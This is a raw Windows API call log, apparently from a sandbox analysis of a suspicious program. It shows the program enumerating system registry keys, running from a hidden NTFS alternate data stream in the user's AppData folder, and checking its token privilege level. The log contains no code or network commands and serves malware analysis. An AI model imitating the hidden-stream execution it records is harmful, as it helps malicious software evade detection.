(HeapHandle=0x820000, Flags=0x0, Size=0x1c) returned 0x8491f0 [0117.578] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x8491f0 | out: hHeap=0x820000) returned 1 [0117.578] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x12) returned 0x848a48 [0117.578] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1c) returned 0x8491f0 [0117.579] RegEnumKeyW (in: hKey=0x260, dwIndex=0x39, lpName=0x19fd50, cchName=0x104 | out: lpName="Nls") returned 0x0 [0117.579] lstrlenW (lpString="Nls") returned 3 [0117.579] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x14) returned 0x8488c8 [0117.579] RegEnumKeyW (in: hKey=0x260, dwIndex=0x3a, lpName=0x19fd50, cchName=0x104 | out: lpName="NodeInterfaces") returned 0x0 [0117.579] lstrlenW (lpString="NodeInterfaces") returned 14 [0117.579] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x16) returned 0x8487a8 [0117.579] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x22) returned 0x849828 [0117.579] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x849828 | out: hHeap=0x820000) returned 1 [0117.579] RegEnumKeyW (in: hKey=0x260, dwIndex=0x3b, lpName=0x19fd50, cchName=0x104 | out: lpName="Notifications") returned 0x0 [0117.579] lstrlenW (lpString="Notifications") returned 13 [0117.579] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x28) returned 0x849768 [0117.579] RegEnumKeyW (in: hKey=0x260, dwIndex=0x3c, lpName=0x19fd50, cchName=0x104 | out: lpName="Nsi") returned 0x0 [0117.579] lstrlenW (lpString="Nsi") returned 3 [0117.579] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x14) returned 0x8489a8 [0117.579] RegEnumKeyW (in: hKey=0x260, dwIndex=0x3d, lpName=0x19fd50, cchName=0x104 | out: lpName="OSExtensionDatabase") returned 0x0 [0117.579] lstrlenW (lpString="OSExtensionDatabase") returned 19 [0117.579] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x24) returned 0x8497c8 [0117.580] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1e) returned 0x848fc0 [0117.580] RegEnumKeyW (in: hKey=0x260, dwIndex=0x3e, lpName=0x19fd50, cchName=0x104 | out: lpName="PnP") returned 0x0 [0117.580] lstrlenW (lpString="PnP") returned 3 [0117.580] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x12) returned 0x8489e8 [0117.580] RegEnumKeyW (in: hKey=0x260, dwIndex=0x3f, lpName=0x19fd50, cchName=0x104 | out: lpName="Power") returned 0x0 [0117.580] lstrlenW (lpString="Power") returned 5 [0117.580] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x18) returned 0x8488e8 [0117.583] RegEnumKeyW (in: hKey=0x260, dwIndex=0x40, lpName=0x19fd50, cchName=0x104 | out: lpName="Print") returned 0x0 [0117.583] lstrlenW (lpString="Print") returned 5 [0117.583] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x18) returned 0x8487c8 [0117.584] RegEnumKeyW (in: hKey=0x260, dwIndex=0x41, lpName=0x19fd50, cchName=0x104 | out: lpName="PriorityControl") returned 0x0 [0117.584] lstrlenW (lpString="PriorityControl") returned 15 [0117.584] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1e) returned 0x848f48 [0117.584] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1c) returned 0x849128 [0117.584] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x849128 | out: hHeap=0x820000) returned 1 [0117.584] RegEnumKeyW (in: hKey=0x260, dwIndex=0x42, lpName=0x19fd50, cchName=0x104 | out: lpName="ProductOptions") returned 0x0 [0117.584] lstrlenW (lpString="ProductOptions") returned 14 [0117.584] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1c) returned 0x8491a0 [0117.584] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1c) returned 0x849128 [0117.584] RegEnumKeyW (in: hKey=0x260, dwIndex=0x43, lpName=0x19fd50, cchName=0x104 | out: lpName="RadioManagement") returned 0x0 [0117.584] lstrlenW (lpString="RadioManagement") returned 15 [0117.584] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x18) returned 0x848748 [0117.584] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x22) returned 0x849a98 [0117.585] RegEnumKeyW (in: hKey=0x260, dwIndex=0x44, lpName=0x19fd50, cchName=0x104 | out: lpName="Remote Assistance") returned 0x0 [0117.585] lstrlenW (lpString="Remote Assistance") returned 17 [0117.585] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1a) returned 0x849010 [0117.585] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x22) returned 0x849c78 [0117.585] RegEnumKeyW (in: hKey=0x260, dwIndex=0x45, lpName=0x19fd50, cchName=0x104 | out: lpName="RetailDemo") returned 0x0 [0117.585] lstrlenW (lpString="RetailDemo") returned 10 [0117.585] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1a) returned 0x848ef8 [0117.585] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x16) returned 0x848968 [0117.585] RegEnumKeyW (in: hKey=0x260, dwIndex=0x46, lpName=0x19fd50, cchName=0x104 | out: lpName="SafeBoot") returned 0x0 [0117.585] lstrlenW (lpString="SafeBoot") returned 8 [0117.585] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x16) returned 0x848aa8 [0117.585] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x16) returned 0x848a68 [0117.585] RegEnumKeyW (in: hKey=0x260, dwIndex=0x47, lpName=0x19fd50, cchName=0x104 | out: lpName="SAM") returned 0x0 [0117.586] lstrlenW (lpString="SAM") returned 3 [0117.586] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x14) returned 0x8486c8 [0117.586] RegEnumKeyW (in: hKey=0x260, dwIndex=0x48, lpName=0x19fd50, cchName=0x104 | out: lpName="ScEvents") returned 0x0 [0117.586] lstrlenW (lpString="ScEvents") returned 8 [0117.586] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x12) returned 0x8489c8 [0117.586] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1a) returned 0x8492e0 [0117.586] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x8492e0 | out: hHeap=0x820000) returned 1 [0117.586] RegEnumKeyW (in: hKey=0x260, dwIndex=0x49, lpName=0x19fd50, cchName=0x104 | out: lpName="ScsiPort") returned 0x0 [0117.586] lstrlenW (lpString="ScsiPort") returned 8 [0117.586] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x16) returned 0x8486e8 [0117.586] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x16) returned 0x848708 [0117.587] RegEnumKeyW (in: hKey=0x260, dwIndex=0x4a, lpName=0x19fd50, cchName=0x104 | out: lpName="SecureBoot") returned 0x0 [0117.587] lstrlenW (lpString="SecureBoot") returned 10 [0117.587] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1a) returned 0x848fe8 [0117.587] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x16) returned 0x848768 [0117.587] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848768 | out: hHeap=0x820000) returned 1 [0117.587] RegEnumKeyW (in: hKey=0x260, dwIndex=0x4b, lpName=0x19fd50, cchName=0x104 | out: lpName="SecurePipeServers") returned 0x0 [0117.587] lstrlenW (lpString="SecurePipeServers") returned 17 [0117.587] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1a) returned 0x849178 [0117.587] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x849178 | out: hHeap=0x820000) returned 1 [0117.587] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x16) returned 0x848788 [0117.588] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1c) returned 0x848f98 [0117.588] RegEnumKeyW (in: hKey=0x260, dwIndex=0x4c, lpName=0x19fd50, cchName=0x104 | out: lpName="SecurityProviders") returned 0x0 [0117.588] lstrlenW (lpString="SecurityProviders") returned 17 [0117.588] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1e) returned 0x849038 [0117.588] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x849038 | out: hHeap=0x820000) returned 1 [0117.588] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x20) returned 0x849088 [0117.588] RegEnumKeyW (in: hKey=0x260, dwIndex=0x4d, lpName=0x19fd50, cchName=0x104 | out: lpName="ServiceAggregatedEvents") returned 0x0 [0117.588] lstrlenW (lpString="ServiceAggregatedEvents") returned 23 [0117.588] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1c) returned 0x849218 [0117.588] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x22) returned 0x8498b8 [0117.588] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1a) returned 0x849038 [0117.588] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x849038 | out: hHeap=0x820000) returned 1 [0117.588] RegEnumKeyW (in: hKey=0x260, dwIndex=0x4e, lpName=0x19fd50, cchName=0x104 | out: lpName="ServiceGroupOrder") returned 0x0 [0117.588] lstrlenW (lpString="ServiceGroupOrder") returned 17 [0117.588] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1c) returned 0x849150 [0117.589] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x849150 | out: hHeap=0x820000) returned 1 [0117.589] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x18) returned 0x848768 [0117.589] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848768 | out: hHeap=0x820000) returned 1 [0117.589] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x18) returned 0x848768 [0117.589] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848768 | out: hHeap=0x820000) returned 1 [0117.589] RegEnumKeyW (in: hKey=0x260, dwIndex=0x4f, lpName=0x19fd50, cchName=0x104 | out: lpName="ServiceProvider") returned 0x0 [0117.589] lstrlenW (lpString="ServiceProvider") returned 15 [0117.589] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1c) returned 0x849290 [0117.589] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x849290 | out: hHeap=0x820000) returned 1 [0117.589] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1e) returned 0x8492e0 [0117.589] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x8492e0 | out: hHeap=0x820000) returned 1 [0117.589] RegEnumKeyW (in: hKey=0x260, dwIndex=0x50, lpName=0x19fd50, cchName=0x104 | out: lpName="Session Manager") returned 0x0 [0117.589] lstrlenW (lpString="Session Manager") returned 15 [0117.589] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1c) returned 0x849038 [0117.589] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1c) returned 0x849290 [0117.590] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x849290 | out: hHeap=0x820000) returned 1 [0117.590] RegEnumKeyW (in: hKey=0x260, dwIndex=0x51, lpName=0x19fd50, cchName=0x104 | out: lpName="SNMP") returned 0x0 [0117.590] lstrlenW (lpString="SNMP") returned 4 [0117.590] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x16) returned 0x848768 [0117.590] RegEnumKeyW (in: hKey=0x260, dwIndex=0x52, lpName=0x19fd50, cchName=0x104 | out: lpName="SQMServiceList") returned 0x0 [0117.590] lstrlenW (lpString="SQMServiceList") returned 14 [0117.590] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x22) returned 0x849858 [0117.590] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x16) returned 0x848ac8 [0117.590] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848ac8 | out: hHeap=0x820000) returned 1 [0117.590] RegEnumKeyW (in: hKey=0x260, dwIndex=0x53, lpName=0x19fd50, cchName=0x104 | out: lpName="Srp") returned 0x0 [0117.590] lstrlenW (lpString="Srp") returned 3 [0117.590] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x14) returned 0x848e48 [0117.590] RegEnumKeyW (in: hKey=0x260, dwIndex=0x54, lpName=0x19fd50, cchName=0x104 | out: lpName="SrpExtensionConfig") returned 0x0 [0117.590] lstrlenW (lpString="SrpExtensionConfig") returned 18 [0117.590] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x14) returned 0x848d88 [0117.590] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848d88 | out: hHeap=0x820000) returned 1 [0117.591] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x20) returned 0x849178 [0117.591] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x849178 | out: hHeap=0x820000) returned 1 [0117.591] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1a) returned 0x849290 [0117.591] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x849290 | out: hHeap=0x820000) returned 1 [0117.591] RegEnumKeyW (in: hKey=0x260, dwIndex=0x55, lpName=0x19fd50, cchName=0x104 | out: lpName="StillImage") returned 0x0 [0117.591] lstrlenW (lpString="StillImage") returned 10 [0117.591] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x18) returned 0x848e68 [0117.591] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x18) returned 0x848e28 [0117.591] RegEnumKeyW (in: hKey=0x260, dwIndex=0x56, lpName=0x19fd50, cchName=0x104 | out: lpName="Storage") returned 0x0 [0117.591] lstrlenW (lpString="Storage") returned 7 [0117.591] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1c) returned 0x849290 [0117.591] RegEnumKeyW (in: hKey=0x260, dwIndex=0x57, lpName=0x19fd50, cchName=0x104 | out: lpName="StorageManagement") returned 0x0 [0117.591] lstrlenW (lpString="StorageManagement") returned 17 [0117.591] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1c) returned 0x848ed0 [0117.592] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848ed0 | out: hHeap=0x820000) returned 1 [0117.592] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x22) returned 0x849bb8 [0117.592] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x849bb8 | out: hHeap=0x820000) returned 1 [0117.592] RegEnumKeyW (in: hKey=0x260, dwIndex=0x58, lpName=0x19fd50, cchName=0x104 | out: lpName="StorPort") returned 0x0 [0117.592] lstrlenW (lpString="StorPort") returned 8 [0117.592] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x16) returned 0x848b08 [0117.592] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x16) returned 0x848be8 [0117.592] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848be8 | out: hHeap=0x820000) returned 1 [0117.592] RegEnumKeyW (in: hKey=0x260, dwIndex=0x59, lpName=0x19fd50, cchName=0x104 | out: lpName="StSec") returned 0x0 [0117.592] lstrlenW (lpString="StSec") returned 5 [0117.592] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x12) returned 0x848c88 [0117.592] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x14) returned 0x848ba8 [0117.592] RegEnumKeyW (in: hKey=0x260, dwIndex=0x5a, lpName=0x19fd50, cchName=0x104 | out: lpName="SystemResources") returned 0x0 [0117.593] lstrlenW (lpString="SystemResources") returned 15 [0117.593] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1a) returned 0x849060 [0117.593] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x849060 | out: hHeap=0x820000) returned 1 [0117.593] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x20) returned 0x849060 [0117.593] RegEnumKeyW (in: hKey=0x260, dwIndex=0x5b, lpName=0x19fd50, cchName=0x104 | out: lpName="TabletPC") returned 0x0 [0117.593] lstrlenW (lpString="TabletPC") returned 8 [0117.593] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1a) returned 0x8492b8 [0117.593] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x12) returned 0x848d28 [0117.593] RegEnumKeyW (in: hKey=0x260, dwIndex=0x5c, lpName=0x19fd50, cchName=0x104 | out: lpName="Terminal Server") returned 0x0 [0117.593] lstrlenW (lpString="Terminal Server") returned 15 [0117.593] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1e) returned 0x8490b0 [0117.593] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1a) returned 0x849150 [0117.593] RegEnumKeyW (in: hKey=0x260, dwIndex=0x5d, lpName=0x19fd50, cchName=0x104 | out: lpName="TimeZoneInformation") returned 0x0 [0117.594] lstrlenW (lpString="TimeZoneInformation") returned 19 [0117.594] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x16) returned 0x848bc8 [0117.594] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x16) returned 0x848d08 [0117.594] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x24) returned 0x849af8 [0117.594] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x849af8 | out: hHeap=0x820000) returned 1 [0117.594] RegEnumKeyW (in: hKey=0x260, dwIndex=0x5e, lpName=0x19fd50, cchName=0x104 | out: lpName="Ubpm") returned 0x0 [0117.594] lstrlenW (lpString="Ubpm") returned 4 [0117.594] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x16) returned 0x848c28 [0117.594] RegEnumKeyW (in: hKey=0x260, dwIndex=0x5f, lpName=0x19fd50, cchName=0x104 | out: lpName="usb") returned 0x0 [0117.594] lstrlenW (lpString="usb") returned 3 [0117.594] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x14) returned 0x848d48 [0117.594] RegEnumKeyW (in: hKey=0x260, dwIndex=0x60, lpName=0x19fd50, cchName=0x104 | out: lpName="usbflags") returned 0x0 [0117.594] lstrlenW (lpString="usbflags") returned 8 [0117.594] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1e) returned 0x849178 [0117.595] RegEnumKeyW (in: hKey=0x260, dwIndex=0x61, lpName=0x19fd50, cchName=0x104 | out: lpName="usbstor") returned 0x0 [0117.595] lstrlenW (lpString="usbstor") returned 7 [0117.595] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1c) returned 0x8493a8 [0117.595] RegEnumKeyW (in: hKey=0x260, dwIndex=0x62, lpName=0x19fd50, cchName=0x104 | out: lpName="VAN") returned 0x0 [0117.595] lstrlenW (lpString="VAN") returned 3 [0117.595] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x14) returned 0x848c48 [0117.595] RegEnumKeyW (in: hKey=0x260, dwIndex=0x63, lpName=0x19fd50, cchName=0x104 | out: lpName="Video") returned 0x0 [0117.595] lstrlenW (lpString="Video") returned 5 [0117.595] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x18) returned 0x848be8 [0117.595] RegEnumKeyW (in: hKey=0x260, dwIndex=0x64, lpName=0x19fd50, cchName=0x104 | out: lpName="WalletService") returned 0x0 [0117.595] lstrlenW (lpString="WalletService") returned 13 [0117.595] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1a) returned 0x8492e0 [0117.595] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1c) returned 0x848ed0 [0117.596] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848ed0 | out: hHeap=0x820000) returned 1 [0117.596] RegEnumKeyW (in: hKey=0x260, dwIndex=0x65, lpName=0x19fd50, cchName=0x104 | out: lpName="wcncsvc") returned 0x0 [0117.596] lstrlenW (lpString="wcncsvc") returned 7 [0117.596] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1c) returned 0x848ed0 [0117.596] RegEnumKeyW (in: hKey=0x260, dwIndex=0x66, lpName=0x19fd50, cchName=0x104 | out: lpName="Wdf") returned 0x0 [0117.596] lstrlenW (lpString="Wdf") returned 3 [0117.596] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x14) returned 0x848ac8 [0117.596] RegEnumKeyW (in: hKey=0x260, dwIndex=0x67, lpName=0x19fd50, cchName=0x104 | out: lpName="WDI") returned 0x0 [0117.596] lstrlenW (lpString="WDI") returned 3 [0117.596] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x14) returned 0x848d68 [0117.596] RegEnumKeyW (in: hKey=0x260, dwIndex=0x68, lpName=0x19fd50, cchName=0x104 | out: lpName="Windows") returned 0x0 [0117.596] lstrlenW (lpString="Windows") returned 7 [0117.596] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1c) returned 0x849560 [0117.596] RegEnumKeyW (in: hKey=0x260, dwIndex=0x69, lpName=0x19fd50, cchName=0x104 | out: lpName="WinInit") returned 0x0 [0117.597] lstrlenW (lpString="WinInit") returned 7 [0117.597] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x14) returned 0x848cc8 [0117.597] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x16) returned 0x848c08 [0117.597] RegEnumKeyW (in: hKey=0x260, dwIndex=0x6a, lpName=0x19fd50, cchName=0x104 | out: lpName="Winlogon") returned 0x0 [0117.597] lstrlenW (lpString="Winlogon") returned 8 [0117.597] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1e) returned 0x8493d0 [0117.597] RegEnumKeyW (in: hKey=0x260, dwIndex=0x6b, lpName=0x19fd50, cchName=0x104 | out: lpName="WMI") returned 0x0 [0117.597] lstrlenW (lpString="WMI") returned 3 [0117.597] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x14) returned 0x848dc8 [0117.597] RegEnumKeyW (in: hKey=0x260, dwIndex=0x6c, lpName=0x19fd50, cchName=0x104 | out: lpName="WorkplaceJoin") returned 0x0 [0117.597] lstrlenW (lpString="WorkplaceJoin") returned 13 [0117.597] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x20) returned 0x8493f8 [0117.597] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x16) returned 0x848c68 [0117.597] RegEnumKeyW (in: hKey=0x260, dwIndex=0x6d, lpName=0x19fd50, cchName=0x104 | out: lpName="WPN") returned 0x0 [0117.598] lstrlenW (lpString="WPN") returned 3 [0117.598] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x14) returned 0x848b48 [0117.598] RegEnumKeyW (in: hKey=0x260, dwIndex=0x6e, lpName=0x19fd50, cchName=0x104 | out: lpName="{7746D80F-97E0-4E26-9543-26B41FC22F79}") returned 0x0 [0117.598] lstrlenW (lpString="{7746D80F-97E0-4E26-9543-26B41FC22F79}") returned 38 [0117.598] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x18) returned 0x848b68 [0117.598] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x14) returned 0x848d88 [0117.598] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x16) returned 0x848ce8 [0117.598] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x16) returned 0x848da8 [0117.598] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x24) returned 0x849b88 [0117.598] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x14) returned 0x848b28 [0117.598] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x16) returned 0x848ca8 [0117.599] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x16) returned 0x848de8 [0117.599] RegEnumKeyW (in: hKey=0x260, dwIndex=0x6f, lpName=0x19fd50, cchName=0x104 | out: lpName="BGFX") returned 0x0 [0117.599] lstrlenW (lpString="BGFX") returned 4 [0117.599] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x16) returned 0x848e08 [0117.599] RegEnumKeyW (in: hKey=0x260, dwIndex=0x70, lpName=0x19fd50, cchName=0x104 | out: lpName="BitlockerStatus") returned 0x0 [0117.599] lstrlenW (lpString="BitlockerStatus") returned 15 [0117.599] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x20) returned 0x849650 [0117.599] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1a) returned 0x8494c0 [0117.599] RegEnumKeyW (in: hKey=0x260, dwIndex=0x71, lpName=0x19fd50, cchName=0x104 | out: lpName="hivelist") returned 0x0 [0117.599] lstrlenW (lpString="hivelist") returned 8 [0117.599] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1e) returned 0x849420 [0117.599] RegEnumKeyW (in: hKey=0x260, dwIndex=0x72, lpName=0x19fd50, cchName=0x104 | out: lpName="hiveredirectionlist") returned 0x0 [0117.600] lstrlenW (lpString="hiveredirectionlist") returned 19 [0117.600] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x34) returned 0x83a4a0 [0117.600] RegEnumKeyW (in: hKey=0x260, dwIndex=0x73, lpName=0x19fd50, cchName=0x104 | out: lpName="SystemInformation") returned 0x0 [0117.600] lstrlenW (lpString="SystemInformation") returned 17 [0117.600] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1a) returned 0x849588 [0117.600] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x849588 | out: hHeap=0x820000) returned 1 [0117.600] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x24) returned 0x8499a8 [0117.600] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x8499a8 | out: hHeap=0x820000) returned 1 [0117.600] RegEnumKeyW (in: hKey=0x260, dwIndex=0x74, lpName=0x19fd50, cchName=0x104 | out: lpName="Winresume") returned 0x0 [0117.600] lstrlenW (lpString="Winresume") returned 9 [0117.600] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x20) returned 0x849448 [0117.600] RegEnumKeyW (in: hKey=0x260, dwIndex=0x75, lpName=0x19fd50, cchName=0x104 | out: lpName="winresume") returned 0x103 [0117.600] RegCloseKey (hKey=0x260) returned 0x0 [0117.600] GetCommandLineW () returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Still:bin -r" [0117.601] StrChrW (lpStart="C:\\Users\\FD1HVy\\AppData\\Roaming\\Still:bin -r", wMatch=0x20) returned=" -r" [0117.601] StrTrimW (in: psz="-r", pszTrimChars=" " | out: psz="-r") returned 0 [0117.601] GetVersion () returned 0x23f00206 [0117.601] GetCurrentProcess () returned 0xffffffff [0117.601] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20008, TokenHandle=0x19ff20 | out: TokenHandle=0x19ff20*=0x260) returned 1 [0117.601] GetTokenInformation (in: TokenHandle=0x260, TokenInformationClass=0x14, TokenInformation=0x19ff18, TokenInformationLength=0x4, ReturnLength=0x19ff24 | out: TokenInformation=0x19ff18, ReturnLength=0x19ff24) returned 1 [0117.601] GetTokenInformation (in: TokenHandle=0x260, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x19ff24 | out: TokenInformation=0x0, ReturnLength=0x19ff24) returned 0 [0117.601] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x14) returned 0x848b88 [0117.601] GetTokenInformation (in: TokenHandle=0x260, TokenInformationClass=0x19, TokenInformation=0x848b88, TokenInformationLength=0x14, ReturnLength=0x19ff24 | out: TokenInformation=0x848b88, ReturnLength=0x19ff24) returned 1 [0117.601] GetSidSubAuthorityCount (pSid=0x848b90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x848b91 [0117.601] GetSidSubAuthority (pSid=0x848b90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x848b98 [0117.601] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848b88 | out: hHeap=0x820000) returned 1 [0117.601] CloseHandle (hObject=0x260) returned 1 [0117.601] lstrlenW (lpString="-r") returned 2 [0117.602] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x6) returned 0x848168 [0117.602] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x4) returned 0x848228 [0117.602] lstrlenW (lpString="-r") returned 2 [0117.680] GetWindowsDirectoryW (in: lpBuffer=0x0, uSize=0x0 | out: lpBuffer=0x0) returned 0xb [0117.680] 